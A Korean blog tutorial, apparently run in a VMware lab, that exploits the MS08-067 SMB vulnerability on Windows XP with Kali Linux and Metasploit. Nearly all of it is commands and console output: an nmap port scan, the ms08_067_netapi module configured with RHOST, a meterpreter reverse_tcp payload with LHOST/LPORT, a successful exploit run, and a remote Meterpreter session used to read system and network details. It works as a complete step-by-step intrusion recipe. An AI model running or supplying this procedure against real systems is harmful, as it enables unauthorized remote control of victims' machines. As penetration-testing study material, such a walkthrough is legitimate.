칼리 리눅스 또는 백트랙에서 진행합니다.
MS08-067 취약점
https://technet.microsoft.com/library/security/ms08-067
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
호스트 포트 스캔
root@kali:~# nmap -v -sT 200.200.200.44 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-16 22:01 EDT Initiating ARP Ping Scan at 22:01 Scanning 200.200.200.44 [1 port] Completed ARP Ping Scan at 22:01, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 22:01 Completed Parallel DNS resolution of 1 host. at 22:01, 0.33s elapsed Initiating Connect Scan at 22:01 Scanning 200.200.200.44 [1000 ports] Discovered open port 445/tcp on 200.200.200.44 Discovered open port 139/tcp on 200.200.200.44 Completed Connect Scan at 22:01, 4.63s elapsed (1000 total ports) Nmap scan report for 200.200.200.44 Host is up (0.00084s latency). Not shown: 998 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:67:81:BB (VMware) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds Raw packets sent: 1 (28B) | Rcvd: 1 (28B)
호스트 Metasploit
1. msfconsole 실행
A database appears to be already configured, skipping initialization , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro Learn more on http://rapid7.com/metasploit =[ metasploit v4.11.5-2016010401 ] + -- --=[ 1517 exploits - 875 auxiliary - 257 post ] + -- --=[ 437 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
2. ms08_067_netapi 실행
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
3. 옵션 확인 & 공격 대상 호스트 IP 설정
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > set RHOST 200.200.200.44 RHOST => 200.200.200.44 msf exploit(ms08_067_netapi) >
4. Playload 를 reverse_tcp로 선택
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
5. 옵션 확인
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 200.200.200.44 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) >
6. Payload IP / Port 설정
. 리스닝 호스트 IP / Port 설정
→ 포트번호는 아무거나 상관없음
msf exploit(ms08_067_netapi) > set LHOST 200.200.200.61 LHOST => 200.200.200.61 msf exploit(ms08_067_netapi) > set LPORT 4444 LPORT => 4444 msf exploit(ms08_067_netapi) >
7. exploit
→ 공격대상 호스트와 세션 연결됨
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 200.200.200.61:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:Korean [*] Selected Target: Windows XP SP3 Korean (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (957487 bytes) to 200.200.200.44 [*] Meterpreter session 1 opened (200.200.200.61:4444 -> 200.200.200.44:4290) at 2016-03-17 11:44:25 -0400 meterpreter >
meterpreter
meterpreter > sysinfo Computer : KJK-9EB673B1C66 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : ko_KR Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 meterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 2 ============ Name : AMD PCNET Family PCI Ethernet Adapter Hardware MAC : 00:0c:29:67:81:bb MTU : 1500 IPv4 Address : 200.200.200.44 IPv4 Netmask : 255.255.255.0 meterpreter >
'시스템 > Metasploit' 카테고리의 다른 글
metasploit 모듈을 이용한 네트워크 스캔 (0) | 2016.03.18 |
---|